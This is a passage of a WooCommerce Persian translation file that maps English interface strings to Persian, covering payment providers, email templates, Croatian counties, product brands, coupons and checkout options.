contain stylistic HTML.'=>'شرح مختصری از انگیزه. می‌تواند شامل HTML با سبک خاص باشد.','The incentive description. It can contain stylistic HTML.'=>'توضیحات انگیزشی. می‌تواند شامل HTML با سبک خاص باشد.','The incentive title. It can contain stylistic HTML.'=>'عنوان تشویقی. می‌تواند شامل HTML با سبک خاص باشد.','The incentive promo ID. This ID need to be fed into the onboarding flow.'=>'شناسه تبلیغاتی تشویقی. این شناسه باید در جریان آشنایی با سیستم وارد شود.','The URL of the image.'=>'آدرس اینترنتی (URL) تصویر.','The URL to hide the suggestion.'=>'نشانی اینترنتی برای پنهان کردن پیشنهاد.','The incentive unique ID. This ID needs to be used for incentive dismissals.'=>'شناسه منحصر به فرد تشویقی. این شناسه باید برای اخراج‌های تشویقی استفاده شود.','The active incentive for the provider.'=>'انگیزه فعال برای ارائه دهنده.','The suggestion ID matching this provider.'=>'شناسه پیشنهادی که با این ارائه‌دهنده مطابقت دارد.','Tag associated with the provider.'=>'برچسب مرتبط با ارائه دهنده.','The tags associated with the provider.'=>'برچسب‌های مرتبط با ارائه‌دهنده.','The description of the payment method. It can contain basic HTML.'=>'شرح روش پرداخت. می‌تواند شامل HTML پایه باشد.','The title of the payment method. Does not include HTML tags.'=>'عنوان روش پرداخت. شامل تگ‌های HTML نمی‌شود.','Whether the payment method should be required (and force-enabled) or not.'=>'اینکه آیا روش پرداخت باید الزامی (و اجباری) باشد یا خیر.','Whether the payment method should be recommended as enabled or not.'=>'اینکه آیا روش پرداخت باید به عنوان فعال توصیه شود یا خیر.','The sort order of the payment method.'=>'ترتیب مرتب‌سازی روش پرداخت.','The unique identifier for the payment method.'=>'شناسه منحصر به فرد برای روش پرداخت.','The details for a recommended payment method.'=>'جزئیات مربوط به روش پرداخت پیشنهادی.','The list of recommended payment methods details for the payment gateway.'=>'لیست جزئیات روش‌های پرداخت پیشنهادی برای درگاه پرداخت.','The state of the onboarding process.'=>'وضعیت فرآیند پذیرش سازمانی.','Onboarding-related details for the provider.'=>'جزئیات مربوط به پذیرش اولیه برای ارائه‌دهنده.','The management details of the provider.'=>'جزئیات مدیریتی ارائه دهنده.','Whether the provider is in dev mode. Having this true usually leads to forcing test payments. '=>'اینکه آیا ارائه‌دهنده در حالت توسعه (dev mode) است یا خیر. اگر این مورد درست باشد، معمولاً منجر به پرداخت‌های اجباری برای آزمایش می‌شود. ','Whether the provider is in test mode for payments processing.'=>'اینکه آیا ارائه‌دهنده در حالت آزمایشی برای پردازش پرداخت‌ها است یا خیر.','Whether the provider needs setup.'=>'اینکه آیا ارائه دهنده نیاز به تنظیمات دارد یا خیر.','Whether the provider has a payments processing account connected.'=>'اینکه آیا ارائه‌دهنده، حساب پردازش پرداخت متصل دارد یا خیر.','Whether the provider is enabled for use on checkout.'=>'اینکه آیا ارائه‌دهنده برای استفاده در هنگام پرداخت فعال است یا خیر.','The URL of the link.'=>'آدرس اینترنتی (URL) لینک.','The status of the plugin.'=>'وضعیت افزونه.','The plugin main file. This is a relative path to the plugins directory.'=>'فایل اصلی افزونه. این یک مسیر نسبی به پوشه افزونه‌ها است.','The general state of the provider with regards to it\'s payments processing.'=>'وضعیت کلی ارائه دهنده خدمات در رابطه با پردازش پرداخت‌هایش.','The URL of the payment method icon or a base64-encoded SVG image.'=>'آدرس اینترنتی (URL) آیکون روش پرداخت یا یک تصویر SVG کدگذاری شده با base64.','The URL to start/continue onboarding for the payment gateway.'=>'آدرس اینترنتی (URL) برای شروع/ادامه‌ی فرآیند آن‌بوردینگ (onboarding) برای درگاه پرداخت.','The start/continue onboarding link for the payment gateway.'=>'لینک شروع/ادامه‌ی فرآیند ثبت‌نام برای درگاه پرداخت.','The URL to the settings page for the payment gateway.'=>'آدرس اینترنتی (URL) صفحه تنظیمات درگاه پرداخت.','The link to the settings page for the payment gateway.'=>'لینک به صفحه تنظیمات درگاه پرداخت.','The type of the link.'=>'نوع پیوند.','Links for the provider.'=>'لینک‌های مربوط به ارائه‌دهنده.','The URL of the provider icon (square aspect ratio - 72px by 72px).'=>'آدرس اینترنتی (URL) آیکون ارائه دهنده (نسبت ابعاد مربع - ۷۲ پیکسل در ۷۲ پیکسل).','The URL of the provider image.'=>'آدرس اینترنتی (URL) تصویر ارائه دهنده.','Whether the onboarding process is completed.'=>'فرآیند پذیرش تکمیل شده است یا خیر.','Whether the onboarding process is started.'=>'فرآیند پذیرش آغاز شده است یا خیر.','The corresponding plugin details of the provider.'=>'جزئیات افزونه‌ی مربوطه از ارائه‌دهنده.','Supported features for this provider.'=>'ویژگی‌های پشتیبانی‌شده برای این ارائه‌دهنده.','The description of the provider.'=>'شرح ارائه دهنده.','The title of the provider.'=>'عنوان ارائه دهنده.','The type of payment provider. Use this to differentiate between the various items in the list and determine their intended use.'=>'نوع ارائه‌دهنده‌ی پرداخت. از این مورد برای تمایز بین موارد مختلف موجود در لیست و تعیین کاربرد مورد نظر آنها استفاده کنید.','The sort order of the provider.'=>'ترتیب مرتب‌سازی ارائه‌دهنده.','The unique identifier for the provider.'=>'شناسه منحصر به فرد برای ارائه دهنده.','A payment provider in the context of the main Payments Settings page list.'=>'یک ارائه‌دهنده پرداخت در چارچوب فهرست صفحه اصلی تنظیمات پرداخت‌ها.','The description of the category.'=>'توضیحات دسته بندی.','The title of the category.'=>'عنوان دسته.','The priority of the category.'=>'اولویت دسته.','The unique identifier for the category.'=>'شناسه منحصر به فرد برای دسته.','A suggestion category.'=>'یک دسته پیشنهادی.','The suggestion categories.'=>'دسته بندی های پیشنهادی.','The list of suggestions, excluding the ones part of the providers list.'=>'فهرست پیشنهادات، به استثنای بخش «آن‌ها» در فهرست ارائه‌دهندگان.','The ordered providers list. This includes registered payment gateways, suggestions, and offline payment methods group entry. The individual offline payment methods are separate.'=>'فهرست ارائه‌دهندگان سفارش داده شده. این شامل درگاه‌های پرداخت ثبت‌شده، پیشنهادها و ورودی گروهی روش‌های پرداخت آفلاین می‌شود. روش‌های پرداخت آفلاین جداگانه هستند.','The order value must be an integer.'=>'مقدار سفارش باید یک عدد صحیح باشد.','The ordering argument must be an object with provider IDs as keys and numeric values as values.'=>'آرگومان ترتیب باید یک شیء با شناسه‌های ارائه‌دهنده به عنوان کلید و مقادیر عددی به عنوان مقدار باشد.','The ordering argument must be an object.'=>'آرگومان ترتیب باید یک شیء باشد.','The location argument must be a valid ISO3166 alpha-2 country code.'=>'آرگومان مکان باید یک کد کشور معتبر ISO3166 alpha-2 باشد.','The location argument must be a string.'=>'آرگومان مکان باید یک رشته باشد.','The context ID for which to dismiss the incentive. If not provided, will dismiss the incentive for all contexts.'=>'شناسه زمینه‌ای که برای آن انگیزه رد می‌شود. اگر ارائه نشود، انگیزه برای همه زمینه‌ها رد خواهد شد.','A map of provider ID to integer values representing the sort order.'=>'نگاشتی از شناسه ارائه‌دهنده به مقادیر صحیح که نشان‌دهنده ترتیب مرتب‌سازی است.','The ISO3166 alpha-2 country code to save for the current user.'=>'کد کشور ISO3166 alpha-2 برای ذخیره برای کاربر فعلی.','Accept payments offline using multiple different methods. These can also be used to test purchases.'=>'پرداخت‌های آفلاین را با استفاده از چندین روش مختلف بپذیرید. از این روش‌ها همچنین می‌توان برای آزمایش خریدها استفاده کرد.','The slug of the plugin.'=>'نامک افزونه.','The type of the plugin.'=>'نوع افزونه.','The ordered offline payment methods providers list.'=>'فهرست ارائه‌دهندگان روش‌های پرداخت آفلاین سفارش داده شده.','ISO3166 alpha-2 country code. Defaults to WooCommerce\'s base location country.'=>'کد کشور ISO3166 alpha-2. به طور پیشفرض، کشور محل قرارگیری ووکامرس.','Payment Providers'=>'ارائه‌دهندگان پرداخت','Buy Now, Pay Later'=>'الان بخر، بعدا پرداخت کن','Error sending test email. Please try again.'=>'خطا در ارسال ایمیل آزمایشی. لطفا دوباره امتحان کنید.','Test email sent to %s.'=>'ایمیل آزمایشی به %s ارسال شد.','Take offline payments'=>'پرداخت‌های آفلاین انجام دهید','Give your shoppers additional ways to pay.'=>'به خریداران خود روش‌های پرداخت اضافی ارائه دهید.','Offer flexible payment options to your shoppers.'=>'گزینه‌های پرداخت انعطاف‌پذیری را به خریداران خود ارائه دهید.','Invalid suggestion ID.'=>'شناسه پیشنهاد نامعتبر است.','Transient saved for key %s.'=>'گذرا برای کلید %s ذخیره شد.','Error saving transient. Please try again.'=>'خطا در ذخیره موقت. لطفا دوباره امتحان کنید.','A subject for provided email type after filters are applied and placeholders replaced.'=>'موضوعی برای نوع ایمیل ارائه شده پس از اعمال فیلترها و جایگزینی متغیرهای ورودی.','The email type to get subject for.'=>'نوع ایمیلی که موضوع آن دریافت می‌شود.','Email address to send the email preview to.'=>'آدرس ایمیل برای ارسال پیش‌نمایش ایمیل.','The email type to preview.'=>'نوع ایمیل برای پیش‌نمایش.','Address Line 2'=>'خط آدرس ۲','Phone number'=>'شماره تلفن','Selling platforms.'=>'فروش پلتفرم ها.','Selling online answer.'=>'فروش آنلاین پاسخنامه.','Business choice.'=>'انتخاب کسب و کار.','Coming Soon template headingStay tuned.'=>'در جریان باشید.','Something big is brewing! Our store is in the works – Launching shortly!'=>'اتفاق بزرگی در راه است! فروشگاه ما در حال ساخت است - به زودی راه اندازی خواهد شد!','Allow shoppers to fast-track the checkout process with express options like Apple Pay and Google Pay.'=>'به خریداران اجازه دهید روند پرداخت را با گزینه‌های اکسپرس مانند Apple Pay و Google Pay تسریع کنند.','Reusable template part for displaying social links on the coming soon page.'=>'بخش قالب قابل استفاده مجدد برای نمایش لینک‌های شبکه‌های اجتماعی در صفحه «به زودی».','Template nameComing soon social links'=>'به زودی لینک‌های شبکه‌های اجتماعی','Controls the display of the apartment (address_2) field in checkout.'=>'نمایش فیلد آپارتمان (آدرس_۲) را در هنگام پرداخت کنترل می‌کند.','Controls the display of the company field in checkout.'=>'نمایش فیلد شرکت را در هنگام پرداخت کنترل می‌کند.','Controls the display of the phone field in checkout.'=>'نمایش فیلد تلفن در هنگام پرداخت را کنترل می‌کند.','The Core Profiler step to mark as complete.'=>'مرحله‌ی Core Profiler برای علامت‌گذاری به عنوان تکمیل‌شده.','Let your shoppers pay upon delivery — by cash or other methods of payment.'=>'به خریداران خود اجازه دهید که هنگام تحویل، پرداخت کنند — به صورت نقدی یا سایر روش‌های پرداخت.','%s transforms your home with our curated collection of home decor, bringing inspiration and style to every corner.'=>'%s با مجموعه منتخب دکوراسیون منزل ما، خانه شما را متحول می‌کند و الهام و سبک را به هر گوشه‌ای از آن می‌آورد.','Limit result set to virtual products.'=>'محدود کردن مجموعه نتایج به محصولات مجازی.','Limit result set to downloadable products.'=>'محدود کردن نتیجه به محصولات قابل دانلود.','Exclude products with any of the types from result set.'=>'محصولاتی را که هر یک از انواع را دارند از مجموعه نتایج حذف کنید.','Limit result set to products with any of the types.'=>'مجموعه نتایج را به محصولاتی با هر یک از انواع محدود کنید.','Exclude products with any of the statuses from result set.'=>'محصولاتی را که هر یک از وضعیت‌ها را دارند از مجموعه نتایج حذف کنید.','Limit result set to products with any of the statuses.'=>'محدود کردن مجموعه نتایج به محصولاتی با هر یک از وضعیت‌ها.','An invalid order status slug was supplied.'=>'یک نامک وضعیت سفارش نامعتبر ارائه شده است.','Custom fonts'=>'فونت‌های سفارشی','Standard fonts'=>'فونت‌های استاندارد','Email preview'=>'پیش‌نمایش ایمیل','Email background'=>'پس‌زمینه ایمیل','Content background'=>'پس‌زمینه محتوا','Set the name and email address you\'d like your outgoing emails to use.'=>'نام و آدرس ایمیلی را که می‌خواهید ایمیل‌های خروجی‌تان استفاده کنند، تنظیم کنید.','Preview your email template. You can also test on different devices and send yourself a test email.'=>'پیش‌نمایش قالب ایمیل خود را مشاهده کنید. همچنین می‌توانید آن را روی دستگاه‌های مختلف آزمایش کنید و یک ایمیل آزمایشی برای خودتان ارسال کنید.','Color palette'=>'پالت رنگ','Accent'=>'لهجه','Font family'=>'خانواده فونت','Secondary text'=>'متن ثانویه','Heading & text'=>'عنوان و متن','This text will appear in the footer of all of your WooCommerce emails.'=>'این متن در پاورقی تمام ایمیل‌های ووکامرس شما نمایش داده می‌شود.','Header alignment'=>'ترازبندی سربرگ','Add your logo to each of your WooCommerce emails. If no logo is uploaded, your site title will be used instead.'=>'لوگوی خود را به هر یک از ایمیل‌های ووکامرس خود اضافه کنید. اگر هیچ لوگویی آپلود نشود، از عنوان سایت شما به جای آن استفاده خواهد شد.','Customize your WooCommerce email template and preview it below.'=>'قالب ایمیل ووکامرس خود را سفارشی کنید و پیش‌نمایش آن را در زیر مشاهده کنید.','Choose a color for your secondary text, such as your footer content. Default %s.'=>'یک رنگ برای متن ثانویه خود، مانند محتوای پاورقی خود، انتخاب کنید. پیشفرض %s.','Set the color of your headings and text. Default %s.'=>'رنگ عنوان‌ها و متن خود را تنظیم کنید. پیشفرض %s.','Choose a background color for the content area of your emails. Default %s.'=>'یک رنگ پس‌زمینه برای قسمت محتوای ایمیل‌های خود انتخاب کنید. پیشفرض %s.','Select a color for the background of your emails. Default %s.'=>'یک رنگ برای پس‌زمینه ایمیل‌های خود انتخاب کنید. پیشفرض %s.','Customize the color of your buttons and links. Default %s.'=>'رنگ دکمه‌ها و لینک‌های خود را سفارشی کنید. پیشفرض %s.','There was an error rendering an email preview.'=>'خطایی در نمایش پیش‌نمایش ایمیل رخ داد.','Zagreb City'=>'شهر زاگرب','Međimurje County'=>'شهرستان مدیموریه','Dubrovnik-Neretva County'=>'شهرستان دوبروونیک-نرتوا','Istria County'=>'شهرستان ایستریا','Split-Dalmatia County'=>'شهرستان اسپلیت-دالماتیا','Vukovar-Srijem County'=>'شهرستان ووکوار-سریه‌م','Šibenik-Knin County'=>'شهرستان سیبنیک-کین','Osijek-Baranja County'=>'شهرستان اوسییک-بارانجا','Zadar County'=>'شهرستان زادار','Brod-Posavina County'=>'شهرستان براد-پوساوینا','Požega-Slavonia County'=>'شهرستان پوژگا-اسلاونیا','Virovitica-Podravina County'=>'شهرستان ویروویتیتسا-پودراوینا','Lika-Senj County'=>'شهرستان لیکا-سنج','Primorje-Gorski Kotar County'=>'شهرستان پریمورجه-گورسکی کوتار','Bjelovar-Bilogora County'=>'شهرستان بیلووار-بیلوگورا','Koprivnica-Križevci County'=>'شهرستان کوپریونیتسا-کریژفچی','Varaždin County'=>'شهرستان واراژدین','Karlovac County'=>'شهرستان کارلواک','Sisak-Moslavina County'=>'شهرستان سیساک-موسلاوینا','Krapina-Zagorje County'=>'شهرستان کراپینا-زاگوریه','Zagreb County'=>'شهرستان زاگرب','Sorry, users with %1$s role cannot be deleted via this endpoint. Allowed roles: %2$s'=>'متاسفانه ! کاربرانی که نقش %1$s دارند را نمی‌توان از طریق این ارجاع حذف کرد. نقش‌های مجاز: %2$s','Sorry, %1$s cannot be updated via this endpoint for a user with role %2$s.'=>'متاسفانه ! %1$s نمی‌تواند از طریق این ارجاع برای کاربری با نقش %2$s بروز رسانی شود.','block descriptionLet shoppers filter products by choosing stock status.'=>'به خریداران اجازه دهید با انتخاب وضعیت موجودی، محصولات را فیلتر کنند.','block descriptionLet shoppers filter products by choosing a price range.'=>'به خریداران اجازه دهید با انتخاب محدوده قیمت، محصولات را فیلتر کنند.','block keywordall products'=>'همه محصولات','block titlePrice Slider'=>'اسلایدر قیمت','block keywordby attribute'=>'براساس ویژگی','block keywordby tag'=>'براساس برچسب','block descriptionDisplay a link to the cart.'=>'نمایش یک پیوند به سبد خرید.','block titleCart Link'=>'پیوند سبد خرید','block descriptionA slider helps shopper choose a price range.'=>'یک اسلایدر به خریدار کمک می‌کند تا محدوده قیمت را انتخاب کند.','block descriptionDisplay removable active filters as chips.'=>'فیلترهای فعال قابل جابجایی را به صورت تراشه نمایش دهید.','block descriptionA notice field for use in the product editor.'=>'یک فیلد اعلان برای استفاده در ویرایشگر محصول.','block titleProduct notice field'=>'فیلد اطلاع رسانی محصول','You do not have permissions to manage plugins. Please contact your site administrator.'=>'شما مجوز مدیریت افزونه‌ها را ندارید. لطفا با مدیر سایت خود تماس بگیرید.','Payment status'=>'وضعیت پرداخت','Order does not have an email address.'=>'سفارش آدرس ایمیل ندارد.','Your order details are as follows:'=>'جزئیات سفارش شما به قرار زیر است:','Email improvements'=>'بهبودهای ایمیل','%1$s order number %2$s'=>'%1$s سفارش شماره %2$s','Unfortunately, we couldn\'t complete your order due to an issue with your payment method.'=>'متأسفانه، به دلیل مشکل در روش پرداخت شما، نتوانستیم سفارش شما را تکمیل کنیم.','The quantity of "%1$s" must be a multiple of %2$s'=>'مقدار "%1$s" باید مضرب %2$s باشد','Email address to send the order details to.'=>'آدرس ایمیل جهت ارسال جزئیات سفارش.','Success'=>'موفق','Cannot place an order, your cart is empty.'=>'امکان ثبت سفارش وجود ندارد، سبد خرید شما خالی است.','Clear options'=>'پاک کردن گزینه‌ها','A message indicating that the action completed successfully.'=>'پیامی که نشان می‌دهد عملیات با موفقیت انجام شده است.','Enable compatibility mode (Synchronize orders between High-performance order storage and WordPress posts storage).'=>'حالت سازگاری را فعال کنید (همگام‌سازی سفارشات بین ذخیره‌سازی سفارشات با کارایی بالا و ذخیره‌سازی پست‌های وردپرس).','Cost of Goods Sold'=>'بهای تمام شده کالای فروش رفته','The maximum quantity of "%1$s" allowed in the cart is %2$s'=>'حداکثر تعداد مجاز "%1$s" در سبد خرید %2$s است','The minimum quantity of "%1$s" allowed in the cart is %2$s'=>'حداقل تعداد مجاز "%1$s" در سبد خرید %2$s است','The quantity of "%1$s" cannot be changed'=>'مقدار "%1$s" قابل تغییر نیست','If you\'d like to continue with your purchase, please return to %s and try a different method of payment.'=>'اگر می‌خواهید به خرید خود ادامه دهید، لطفا به %s بازگردید و روش پرداخت دیگری را امتحان کنید.','Show Price'=>'نمایش قیمت','Hide Price'=>'مخفی کردن قیمت','All Products ( new )'=>'همه محصولات ( جدید )','Page'=>'برگه','Your order at {site_title} was unsuccessful'=>'سفارش شما در {site_title} ناموفق بود','Sorry, your order was unsuccessful'=>'با عرض پوزش، سفارش شما ناموفق بود','Is this theme a block theme?'=>'آیا این پوسته یک پوسته بلوک است؟','View order %s'=>'مشاهده سفارش %s','%1$s - Image %2$s'=>'%1$s - تصویر %2$s','Grow your business with Facebook and Instagram'=>'کسب و کار خود را با فیس بوک و اینستاگرام توسعه دهید','Cancel order %s'=>'لغو سفارش %s','Pay for order %s'=>'پرداخت برای سفارش %s','Total value of the Cost of Goods Sold for the order.'=>'ارزش کل بهای تمام شده کالای فروش رفته برای سفارش.','Cost of Goods Sold data.'=>'داده‌های بهای تمام شده کالای فروش رفته.','Order failed emails are sent to customers when their orders are marked as failed.'=>'ایمیل‌های سفارش ناموفق زمانی برای مشتریان ارسال می‌شوند که سفارش‌هایشان به عنوان ناموفق علامت‌گذاری شده باشد.','Sync your store catalog, set up pixel tracking, and run targeted ad campaigns.'=>'کاتالوگ فروشگاه خود را همگام‌سازی کنید، ردیابی پیکسل را تنظیم کنید و کمپین‌های تبلیغاتی هدفمند اجرا کنید.','Let your shoppers know your site or part of your site is under construction.'=>'به خریداران خود اطلاع دهید که سایت شما یا بخشی از سایت شما در دست ساخت است.','Track orders & view shopping history'=>'پیگیری سفارشات و مشاهده سابقه خرید','Value of the Cost of Goods Sold for the order item.'=>'ارزش بهای تمام شده کالای فروش رفته برای کالای سفارش داده شده.','Cost of Goods Sold data. Only present for product line items.'=>'داده‌های بهای تمام‌شده کالای فروش رفته. فقط برای اقلام خط تولید ارائه می‌شود.','Total monetary value of the Cost of Goods Sold for the product (sum of all the effective values).'=>'ارزش پولی کل بهای تمام شده کالای فروش رفته برای محصول (مجموع تمام ارزش‌های مؤثر).','Effective monetary cost value.'=>'ارزش هزینه پولی مؤثر.','Defined cost value.'=>'ارزش هزینه تعریف شده.','Cost of Goods Sold values for the product.'=>'مقادیر بهای تمام شده کالای فروش رفته برای محصول.','Meta Ads & Pixel for WooCommerce'=>'تبلیغات متا و پیکسل برای ووکامرس','Template nameProducts by Brand'=>'محصولات بر اساس برند','Classic theme'=>'پوسته کلاسیک','Block theme'=>'پوسته بلوک','Theme type'=>'نوع پوسته','After checkout (recommended)'=>'پس از پرداخت (توصیه می‌شود)','Enable an account creation method to use this feature.'=>'یک روش ایجاد حساب کاربری را برای استفاده از این ویژگی فعال کنید.','Enable guest checkout to use this feature.'=>'برای استفاده از این ویژگی، تسویه حساب مهمان را فعال کنید.','Customers can create an account after their order is placed. Customize messaging %1$shere%2$s.'=>'مشتریان پس از ثبت سفارش می‌توانند یک حساب کاربری ایجاد کنند. سفارشی کردن پیام %1$sاینجا%2$s.','This feature is only available with the Cart & Checkout blocks. %1$sLearn more%2$s.'=>'این ویژگی فقط با بلوک‌های سبد خرید و پرداخت در دسترس است. %1$sبیشتر بیاموزید%2$s.','Method %1$s is not implemented. Classes overriding has_cogs must override this method too.'=>'متد %1$s پیاده‌سازی نشده است. کلاس‌هایی که has_cogs را override می‌کنند باید این متد را نیز override کنند.','View full-screen image gallery'=>'مشاهده گالری تصاویر به صورت تمام صفحه','Displays whether the current active theme is a block theme or a classic theme.'=>'نمایش می‌دهد که آیا قالب فعال فعلی یک قالب بلوکی است یا یک قالب کلاسیک.','Your store is using shortcode checkout. Use the Checkout blocks to activate this option.'=>'فروشگاه شما از پرداخت با کد کوتاه استفاده می‌کند. برای فعال کردن این گزینه از بلوک‌های پرداخت استفاده کنید.','Your selection has been reset. Please select some product options before adding this product to your cart.'=>'انتخاب شما بازنشانی شد. لطفا قبل از افزودن این محصول به سبد خرید، برخی از گزینه‌های محصول را انتخاب کنید.','block titleProduct Image'=>'تصویر محصول','block titleOn-Sale Badge'=>'نشان حراج','block descriptionDisplays an on-sale badge if the product is on-sale.'=>'اگر محصول در حراج باشد، یک نشان حراج نمایش می‌دهد.','block descriptionDisplay the main product image.'=>'نمایش تصویر اصلی محصول.','block descriptionDisplay the price of a product.'=>'نمایش قیمت یک محصول.','block descriptionDisplay filter options as chips.'=>'نمایش گزینه‌های فیلتر به صورت چیپس.','block titleList'=>'فهرست','block titleAccount Creation'=>'ایجاد حساب کاربری','block titleChips'=>'چیپس','block descriptionDisplay a list of filter options.'=>'نمایش یک فهرست از گزینه‌های فیلتر.','Securely save payment info'=>'ذخیره اطلاعات پرداخت به طور ایمن','Faster future purchases'=>'خریدهای آینده سریعتر','Site visibility badge'=>'نشان رویت‌پذیری','Enable the site visibility badge in the WordPress admin bar'=>'فعال‌سازی نشان رویت‌پذیری سایت در نوار مدیریت وردپرس','Sort by'=>'مرتب‌سازی بر اساس','Return to the Plugins page'=>'بازگشت به صفحه افزونه‌ها','↑ Top'=>'↑ بالا','This plugin can no longer be activated because its functionality is now included in WooCommerce. It is recommended to delete it.'=>'این افزونه دیگر نمی‌تواند فعال شود زیرا قابلیت آن اکنون در ووکامرس گنجانده شده است. توصیه می‌شود آن را حذف کنید.','This plugin cannot be activated because its functionality is now included in WooCommerce core.'=>'این افزونه را نمی‌توان فعال کرد زیرا عملکرد آن اکنون در هسته ووکامرس گنجانده شده است.','FTS index recreated.'=>'فهرست FTS دوباره ایجاد شد.','Plugin Activation Error'=>'خطای فعال‌سازی پخطاین','Failed to create FTS index on order address table. Please go to WooCommerce > Status > Tools and run the "Re-create Order Address FTS index" tool.'=>'ایجاد فهرست FTS در جدول آدرس سفارش ناموفق بود. لطفا به WooCommerce > Status > Tools بروید و ابزار "ایجاد مجدد فهرست FTS آدرس سفارش" را اجرا کنید.','Failed to modify existing FTS index. Please go to WooCommerce > Status > Tools and run the "Re-create Order Address FTS index" tool.'=>'تغییر فهرست FTS موجود ناموفق بود. لطفا به WooCommerce > Status > Tools بروید و ابزار "ایجاد مجدد فهرست FTS آدرس سفارش" را اجرا کنید.','Your account has been successfully created'=>'حساب کاربری شما با موفقیت ایجاد شد','Payment:'=>'پرداخت:','Password must be at least 8 characters.'=>'رمز عبور باید حداقل ۸ کاراکتر باشد.','Unable to create account. Please try again.'=>'ایجاد حساب کاربری ممکن نیست. لطفا دوباره امتحان کنید.','Order #:'=>'شماره سفارش:','Order by:'=>'سفارش توسط:','Hide empty brands:'=>'پنهان کردن برندهای خالی:','The email address provided does not match the email address on this order.'=>'آدرس ایمیل ارائه شده با آدرس ایمیل این سفارش مطابقت ندارد.','Sorted by price: low to high'=>'مرتب‌سازی بر اساس قیمت: کم به زیاد','Sorted by latest'=>'مرتب‌سازی بر اساس جدیدترین','Sorted by average rating'=>'مرتب‌سازی بر اساس میانگین امتیاز','Sorted by price: high to low'=>'مرتب‌سازی بر اساس قیمت: زیاد به کم','Sorted by popularity'=>'مرتب‌سازی بر اساس محبوبیت','Title:'=>'عنوان:','Name of the plugin.'=>'نام افزونه.','Display Type:'=>'نوع نمایش:','Current plugin version.'=>'نسخه کنونی افزونه.','WooCommerce Brand Description'=>'توضیح برند ووکامرس','When viewing a brand archive, show the current brands description.'=>'هنگام مشاهده بایگانی برند، توضیح برندهای فعلی را نشان دهید.','WooCommerce Brand Thumbnails'=>'بندانگشتی برند ووکامرس','Show a grid of brand thumbnails.'=>'شبکه‌ای از بندانگشتی‌های برند را نشان دهید.','Latest available plugin version.'=>'آخرین نسخه موجود افزونه.','Plugin URL.'=>'URL افزونه.','Plugin author name.'=>'نام سازنده افزونه.','Plugin author URL.'=>'URL سازنده افزونه.','Any Brand'=>'هر برندی','Fluid columns:'=>'ستون‌های سیال:','This order is already linked to a user account.'=>'این سفارش از قبل به یک حساب کاربری مرتبط شده است.','WooCommerce Brand Layered Nav'=>'منوی لایه‌ای برند ووکامرس','Whether the plugin can only be activated network-wide.'=>'اینکه آیا افزونه فقط می‌تواند در کل شبکه فعال شود یا خیر.','Plugin basename. The path to the main plugin file relative to the plugins directory.'=>'نام پایه افزونه. مسیر فایل اصلی افزونه نسبت به دایرکتوری افزونه‌ها.','Number:'=>'شماره:','You can now %1$sview your recent orders%4$s, manage your %2$sshipping and billing addresses%4$s, and edit your %3$spassword and account details%4$s.'=>'اکنون می‌توانید %1$s سفارش‌های اخیر خود را مشاهده کنید%4$s,مدیریت %2$sآدرس‌های ارسال و صورتحساب%4$s,و %3$sرمز عبور و جزئیات حساب %4$s خود را ویرایش کنید.','Shows brands in a widget which lets you narrow down the list of products when viewing products.'=>'برندها را در یک ویجت نشان می‌دهد که به شما امکان می‌دهد هنگام مشاهده محصولات، لیست محصولات را محدودتر کنید.','You don\'t have subscriptions for %1$s Woo extensions. Subscribe to receive updates and streamlined support.'=>'شما اشتراک %1$s افزونه‌های وو را ندارید. برای دریافت بروز رسانی‌ها و پشتیبانی ساده، مشترک شوید.','You don\'t have a subscription for %1$s. Subscribe to receive updates and streamlined support.'=>'شما اشتراک %1$s را ندارید. برای دریافت بروز رسانی‌ها و پشتیبانی ساده، مشترک شوید.','Exclude:'=>'استثناها:','SKU: '=>'SKU: ','Product brand base'=>'بر اساس برند محصول','brand'=>'برند','Brand'=>'برند','Search Brands'=>'جستجوی برندها','All Brands'=>'همه برندها','Filter by brand'=>'فیلتر بر اساس برند','Create new brand'=>'ایجاد برند جدید','No Brands Found'=>'هیچ برندی پیدا نشد','New Brand Name'=>'نام برند تازه','Add New Brand'=>'افزودن برند تازه','Edit Brand'=>'ویرایش برند','Parent Brand:'=>'برند مادر:','Parent Brand'=>'برند مادر','Sorry, this coupon is not applicable to the brands of selected products.'=>'با عرض پوزش، این کوپن برای برندهای محصولات انتخابی قابل استفاده نیست.','e.g. length or weight'=>'برای مثال: طول یا وزن','Brands Archives'=>'بایگانی‌های برند','No brands'=>'بدون برند','Product must not be associated with these brands for the coupon to remain valid or, for "Product Discounts", products associated with these brands will not be discounted.'=>'برای اینکه کوپن معتبر باقی بماند، محصول نباید با این برندها مرتبط باشد یا برای «تخفیف‌های محصول»، محصولات مرتبط با این برندها تخفیف نخواهند گرفت.','This tool will recreate the full text search index for order addresses. If the index does not exist, it will try to create it.'=>'این ابزار، فهرست جستجوی متن کامل را برای آدرس‌های سفارش بازسازی می‌کند. اگر این فهرست وجود نداشته باشد، سعی می‌کند آن را ایجاد کند.','Limit result set to products assigned a specific brand ID.'=>'محدود کردن مجموعه نتایج به محصولاتی که شناسه برند خاصی به آنها اختصاص داده شده است.','Re-create Order Address FTS index'=>'ایجاد مجدد فهرست FTS آدرس سفارش','Recreate index'=>'بازسازی فهرست','← Go to Brands'=>'; رفتن به برندها','Choose to show the brand description on the archive page. Turn this off if you intend to use the description widget instead. Please note: this is only for themes that do not show the description.'=>'نمایش توضیحات برند در صفحه بایگانی را انتخاب کنید. اگر قصد دارید از ابزارک توضیحات استفاده کنید، این گزینه را غیرفعال کنید. لطفا توجه داشته باشید: این فقط برای قالب‌هایی است که توضیحات را نشان نمی‌دهند.','Update Brand'=>'بروز رسانی تازه',' You don\'t have a subscription, subscribe to update.'=>' شما اشتراک ندارید، مشترک شوید تا بروز رسانی شود.','%s: '=>'%s: ','Brands can be added and managed from this screen. You can optionally upload a brand image to display in brand widgets and on brand archives'=>'در این صفحه می‌توان برندها را اضافه و مدیریت کرد. می‌توانید در صورت تمایل، یک تصویر برند را برای نمایش در ابزارک‌های برند و در بایگانی‌های برند آپلود کنید','slugbrand'=>'برند','Brands'=>'برندها','Product brands'=>'برندهای محصول','Exclude brands'=>'برندهای مستثنی','Any brand'=>'هر برندی','A product must be associated with this brand for the coupon to remain valid or, for "Product Discounts", products with these brands will be discounted.'=>'یک محصول باید با این برند مرتبط باشد تا کوپن معتبر بماند یا برای «تخفیف‌های محصول»، محصولات با این برندها تخفیف داده می‌شوند.','Red'=>'قرمز','Product Pagination'=>'صفحه‌بندی محصول','Coming soon'=>'به زودی','Payments made simple, with no monthly fees – designed exclusively for WooCommerce stores. Accept credit cards, debit cards, and other popular payment methods.'=>'پرداخت‌ها ساده و بدون کارمزد ماهانه انجام می‌شود - منحصرا برای 